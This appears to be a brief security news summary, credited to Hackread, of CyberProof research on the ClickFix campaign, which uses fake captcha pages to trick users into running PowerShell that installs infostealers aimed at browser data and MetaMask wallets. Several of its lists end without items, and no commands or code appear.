Originally reported by Hackread
TL;DR
CyberProof researchers document ClickFix operation's expansion into cryptocurrency theft, using fake captchas to deploy infostealers across 25+ browsers and MetaMask wallets.
This represents an evolution of an existing threat campaign targeting valuable assets like crypto wallets, but lacks indicators of mass exploitation or critical infrastructure impact.
CyberProof researchers have documented a significant expansion of the ClickFix operation, with threat actors now targeting cryptocurrency assets alongside traditional browser data theft. The campaign leverages fake captcha verification pages to socially engineer users into executing malicious PowerShell commands that deploy sophisticated infostealers.
The updated ClickFix campaign specifically targets:
The social engineering component remains consistent with previous ClickFix operations - users encounter what appears to be a legitimate captcha verification system. When users attempt to "verify" their human status, they are presented with instructions to copy and execute PowerShell commands, ostensibly to resolve a technical issue.
Once executed, the PowerShell payload deploys an infostealer capable of:
The targeting of MetaMask and other browser-based cryptocurrency wallets represents a notable evolution in the ClickFix operation's scope. Browser extension wallets store sensitive cryptographic material that, when compromised, provides direct access to victim cryptocurrency holdings without requiring additional authentication factors.
Security teams should monitor for:
Originally reported by Hackread